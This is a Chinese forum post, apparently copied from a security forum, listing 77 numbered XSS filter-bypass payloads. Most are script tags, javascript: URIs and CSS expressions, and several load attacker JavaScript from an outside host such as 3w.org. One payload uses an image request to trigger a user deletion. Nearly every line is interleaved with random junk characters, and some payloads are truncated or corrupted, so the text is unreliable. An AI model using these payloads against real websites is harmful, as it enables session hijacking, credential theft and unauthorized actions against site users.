貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
- G" I, c+ K- j) M# {2 @* _(1)普通的XSS JavaScript注入
$ Z/ c+ W$ G% W8 p; t; G<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: |* G" X9 x# p% N/ [" ?+ M# K(2)IMG标签XSS使用JavaScript命令. T$ z! Z) { @( N, E- F/ I
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) }! r" ]; L% ]' H$ K! Q(3)IMG标签无分号无引号0 H# T. [$ ]1 \2 r7 _( E( M8 }
<IMG SRC=javascript:alert(‘XSS’)>- B! g& R* X& o+ ` P& s
(4)IMG标签大小写不敏感$ [) t% B: ?+ r; g. k
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>* [7 d9 u5 T5 n/ I$ z+ Y# l
(5)HTML编码(必须有分号)
7 I# k J+ H/ L2 Z9 s/ q2 y<IMG SRC=javascript:alert(“XSS”)>* G+ F- v# S6 Z/ R
(6)修正缺陷IMG标签
( h; F3 c- c1 p0 I. k# n<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. k' `0 _, ]) v8 z" X. D- x5 @
) `& q+ c9 N5 V5 _0 X6 X9 \& \% _. l6 g; T1 M
(7)formCharCode标签(计算器)' A/ {+ i4 J' \: B+ f* l: H7 g
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
/ `. i# a/ s I( G+ o(8)UTF-8的Unicode编码(计算器)
. I7 x+ d# ?* Y6 H% i; G# f6 f<IMG SRC=jav..省略..S')>
5 D" e; j. X( N) `2 ^6 q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 ^5 V: S* {+ N( M* d/ G$ e
<IMG SRC=jav..省略..S')>- e4 H' g( q L
(10)十六进制编码也是没有分号(计算器)+ Q% \( u0 Q5 I3 k# s
<IMG SRC=java..省略..XSS')>
1 }" \' V V. b2 [# @/ V+ ?(11)嵌入式标签,将Javascript分开( T. o+ ^/ o# B2 Z* F/ S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ x* p" A, l7 X(12)嵌入式编码标签,将Javascript分开
3 D6 }9 }$ N% }7 X<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ G2 E# X5 g) s* c0 l(13)嵌入式换行符: G. `' x! b: T+ ]6 |
<IMG SRC=”jav ascript:alert(‘XSS’);”>, T1 @( }! |, h- o& i
(14)嵌入式回车# T; q% L a) ~5 D/ D! q
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 A- M1 L5 @2 h" f% ?0 V3 \. Z8 ~
(15)嵌入式多行注入JavaScript,这是XSS极端的例子" Z# Y! {2 F0 N
<IMG SRC=”javascript:alert(‘XSS‘)”>
u9 h6 V% A- e(16)解决限制字符(要求同页面)( @% a" a. N1 d5 `; W' o/ N
<script>z=’document.’</script>& ]6 q* r6 P8 w3 i, c! R) `) n
<script>z=z+’write(“‘</script>
0 X6 `3 k0 t& k* N9 a, e. ]<script>z=z+’<script’</script>9 L+ ]% t8 v2 U& t7 |0 I
<script>z=z+’ src=ht’</script>( P1 ]* q& Q# K6 o# l
<script>z=z+’tp://ww’</script>
- U# o! E: ^# t<script>z=z+’w.shell’</script>
$ v% E0 I/ V, U<script>z=z+’.net/1.’</script>
- N- o# r) k: s<script>z=z+’js></sc’</script>. M: W1 e; s; S. C7 Y& @3 J2 o( C
<script>z=z+’ript>”)’</script>
% s1 Z* n+ H0 h& D<script>eval_r(z)</script>* J% o0 R3 z& n; ]4 q
(17)空字符12-7-1 T00LS - Powered by Discuz! Board4 y/ y! d3 z9 \) P- e/ F: @! I8 H/ r
https://www.t00ls.net/viewthread ... table&tid=15267 2/6, r, W- i; F" X- V! E
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ L, g! z7 X, C% n2 ~2 M
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 V, h7 O- Y% O: N: ~: P! ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 _* i6 O( U7 [(19)Spaces和meta前的IMG标签
9 }# x6 a& x$ ~7 y& w8 n<IMG SRC=” javascript:alert(‘XSS’);”>- X* ]6 z; y8 |
(20)Non-alpha-non-digit XSS4 G2 p6 Q0 B4 n& @
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* r, I; p$ i) r+ X% J
(21)Non-alpha-non-digit XSS to 2- g9 b2 f7 Z# A9 Y1 X8 w
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 D6 ]9 }0 m! a! |: `( Y(22)Non-alpha-non-digit XSS to 3
. g" G0 Z: p# b' V- p1 ~0 g6 ^<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> _8 C) |1 Y* { j5 m' t) u
(23)双开括号
+ d% L! _. v7 Q; `8 o<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: C. [8 Z5 i4 {: }5 L1 f( g% `# U4 i(24)无结束脚本标记(仅火狐等浏览器)) X7 h3 `! Y( i' Y5 ]
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& k& Z$ L; f3 X) X+ m5 `(25)无结束脚本标记2$ g3 p- |2 ~$ V
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 C3 y- l ^/ R4 [) P% o. w(26)半开的HTML/JavaScript XSS; q3 |; Z& V9 W2 D' {2 R1 } b
<IMG SRC=”javascript:alert(‘XSS’)”
* r( w0 T2 E; h4 P# _(27)双开角括号
: o2 s! d" R/ ~" R0 w<iframe src=http://3w.org/XSS.html <* m" r* m3 f& c l( f0 @9 A' E
(28)无单引号 双引号 分号! x U4 c: {5 _
<SCRIPT>a=/XSS/' I" c0 }9 e6 [6 [, s
alert(a.source)</SCRIPT>
, V5 @& m8 H% q(29)换码过滤的JavaScript' {& d* w1 U; q! k7 n6 K: ]) a
\”;alert(‘XSS’);//+ ?4 A5 @# s' F& E& W( ?! T
(30)结束Title标签4 O) W/ E2 ]: i' |' q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! v7 L) L, F/ h/ }1 n7 M5 F
(31)Input Image% t, y" L6 P8 D
<INPUT SRC=”javascript:alert(‘XSS’);”>1 u5 ]! v' F; R# X! k& y1 F
(32)BODY Image; b! U- l2 i7 t9 J
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
: D6 L' i7 R: h(33)BODY标签, M: k- J+ ?: h- I1 q3 _
<BODY(‘XSS’)>
! M* ?# B2 l2 l1 R, v. I" D(34)IMG Dynsrc$ s9 T- g! a0 ^- O
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! D7 j) d# d: u0 \. B: ~( h(35)IMG Lowsrc
1 u; X$ Z( @6 ^: l/ n0 O& S; ~% z<IMG LOWSRC=”javascript:alert(‘XSS’)”>
* g* w3 j' g6 t) V0 \4 D(36)BGSOUND. m8 S; j; Q5 z2 Z
<BGSOUND SRC=”javascript:alert(‘XSS’);”>2 P; k2 V! d2 r0 ~8 r; S7 Q4 b
(37)STYLE sheet0 W7 V/ S& `2 ?6 H
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
`7 p$ r+ T9 ~! ~* H. p(38)远程样式表
" i0 D9 ~% x8 J5 K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>1 p @3 n% w* |9 O& p6 @# b! J- m* J
(39)List-style-image(列表式)
5 \7 u2 C! ]8 e# ]4 [0 y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# w: `% X0 J) w6 i1 N) I(40)IMG VBscript$ ?2 R# y1 F8 K* C" C1 }. O# `
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS/ P2 V1 o+ Q! _# M
(41)META链接url/ u8 P9 }+ k: Q; h/ O5 _1 a
# ^( h3 c) k! K3 T8 [% u. \) Q" x
8 m" {, N- b% b6 b* Z1 L% ]* H<META HTTP-EQUIV=”refresh” CONTENT=”0;
% L1 N2 ^" T% q+ z; [! C) A8 dURL=http://;URL=javascript:alert(‘XSS’);”>) v( ]3 _ ]: \# S9 X4 @5 T- ?3 O5 R
(42)Iframe* |9 J. X" X' c
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ o" i9 F3 @8 F, f/ N3 h1 B(43)Frame9 |2 w+ @! t7 z# |3 }1 N9 F
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board1 M* K, _. F& j! N+ R& h( N& [
https://www.t00ls.net/viewthread ... table&tid=15267 3/6# l9 a; P! h9 v3 O% ?6 b6 T
(44)Table/ U9 M0 j: [/ f( ]( a# i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 K9 J- h/ d- \3 ^
(45)TD. s2 L W1 e0 h' b3 c$ L
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
; W3 E, l! w, p7 [4 j" v(46)DIV background-image
* ]; k$ s+ q) w! O/ u, Y( s6 ], K0 Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- Q5 B) F' W, n# ~% P(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8 e! j, K4 K6 B% V9 Q. h. ~
8&13&12288&65279)' o7 w! l7 j/ K$ `2 ?% B
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ p* o$ X6 r; ?7 ^(48)DIV expression, Q) q4 D. `/ e9 V, Y6 t/ V
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
8 H. o$ o; n' T0 B3 S" Y; r(49)STYLE属性分拆表达; U: x9 F+ s# P+ O3 k9 }; O
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ I3 K% ?9 d( |& f(50)匿名STYLE(组成:开角号和一个字母开头)
% r3 e) B' h3 B) @9 s<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
% y0 o% r. b+ H5 R( A(51)STYLE background-image
' n) w% u% C9 w) [<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; @) t3 f: C- h2 QCLASS=XSS></A> X% A6 Y* R8 J0 p) r+ a6 S
(52)IMG STYLE方式& m( b: r+ k+ t* w
exppression(alert(“XSS”))’>
8 e9 j. {1 @' V6 O+ K1 T# X/ T(53)STYLE background
9 P" c% T) j( v+ [7 j, |<STYLE><STYLE( ?5 a* G8 T* s& c
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' {5 g) D9 n; [, u3 K4 `
(54)BASE
7 ~3 k6 X7 c, t" H7 K p<BASE HREF=”javascript:alert(‘XSS’);//”>
& p. e' S p5 H: Q: n( _; h. w(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 L# m. [/ G' `' s7 W6 c<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ L3 `5 f8 d5 G8 q3 c
(56)在flash中使用ActionScrpt可以混进你XSS的代码
* z' m6 N! R* H# @* `a=”get”;
' p1 I. v* r: h1 xb=”URL(\”";( c2 L0 L D8 |
c=”javascript:”;
1 t4 x" {- N9 ]d=”alert(‘XSS’);\”)”;* j. g+ d7 s4 R; v% Z+ S1 t
eval_r(a+b+c+d);
* E: l* ^1 Q. A0 \" y(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
( X5 o# L3 M9 ?1 t% Q8 Z+ S<HTML xmlns:xss>7 u2 T: ]# X. [4 j5 u3 z3 G
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
$ J. ]5 a2 ^: m8 g% {, ~<xss:xss>XSS</xss:xss>8 [' M9 f3 i, G8 X7 G5 }9 I
</HTML>
( y' @3 m* T* S5 ?# C(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- e$ l; j+ K8 f+ ~4 Z<SCRIPT SRC=””></SCRIPT>
$ \% H+ d0 S& d- P9 I9 ](59)IMG嵌入式命令,可执行任意命令6 D5 `( O7 U4 r* f# i
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
% u/ h* y1 x1 A1 V: D(60)IMG嵌入式命令(a.jpg在同服务器)4 |% D' l* J- v4 X% a$ w
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser9 [" o, R' B3 b9 n1 y9 P! G. h6 u; ]
(61)绕符号过滤: w7 V7 U. o5 i# V2 Q: E
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>! u3 X2 b" E0 y
(62)
/ ]+ ?9 w8 C. v; q. j j6 d4 y<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 X+ v U3 Y- `( U2 E5 r
(63)1 M4 u( n' `5 a& Z+ a: P1 E! S
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% l G% }1 q# v. S( `2 {
(64)5 q5 c) m* S9 y
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>: @2 l7 u( V7 V: G0 ~/ x
(65)
) W( }" c2 `1 e<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>5 ?5 a' f& U" S; j
(66)12-7-1 T00LS - Powered by Discuz! Board
0 \! N9 m8 ]( |9 \https://www.t00ls.net/viewthread ... table&tid=15267 4/6
4 x$ L, ?2 j* R<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
( _1 ?9 ?) n1 w& e. i. v(67)
) B2 A; F* R3 F1 X X) I<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>, y2 b" F& H" l7 U% e% ?9 Z; i3 [
</SCRIPT>
+ S- |* b% Q9 x4 X9 {(68)URL绕行
1 Y' Z0 O0 }0 k; S; ^+ |: V; Y3 V7 k<A HREF=”http://127.0.0.1/”>XSS</A>! m1 k7 ]1 n7 o; A' ]
(69)URL编码
/ r* x0 o* a3 J<A HREF=”http://3w.org”>XSS</A>7 ~ L% G- G+ v& K" ? ~" U' f
(70)IP十进制
9 M0 h4 A" N" |$ K1 `1 l2 a* O<A HREF=”http://3232235521″>XSS</A>
) R+ o1 a) @' @(71)IP十六进制
! p: P2 X1 M. t1 j6 S! \<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>/ E8 Z, _: K7 K( a* Y
(72)IP八进制" O# |, m8 S! W
<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 c$ n& N- u+ X* V, @4 b8 Q7 U
(73)混合编码
% ~; n3 t9 N0 Y$ G. V- B" {, A<A HREF=”h
7 G+ `2 X6 }; K$ q: c% t5 P, p# ?) ~tt p://6 6.000146.0×7.147/”">XSS</A>' F$ T; G* t. P# z
(74)节省[http:]
4 @( g+ x& `7 c9 H0 h1 Z; V3 x<A HREF=”//www.google.com/”>XSS</A>8 D' Q. `9 ]: i% u8 t: h
(75)节省[www]; K+ ^2 l; n/ P6 u, q+ Q
<A HREF=”http://google.com/”>XSS</A>
+ s1 E3 M$ B; F7 R3 G0 ] d9 F(76)绝对点绝对DNS
8 o- C K; E0 {! g# w0 b<A HREF=”http://www.google.com./”>XSS</A>
6 K# _ I/ N/ ](77)javascript链接* V- u. x, a" f" D' s: u
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>7 H! |" H! ]! M: N8 Q1 x
- z p; }! u K/ n( u
原文地址:http://fuzzexp.org/u/0day/?p=143 ^' i4 Y4 a% B$ \0 U, D6 o& q
; x6 j4 v7 u1 c
|
发表于 2013-4-19 19:22:37
收藏
支持
反对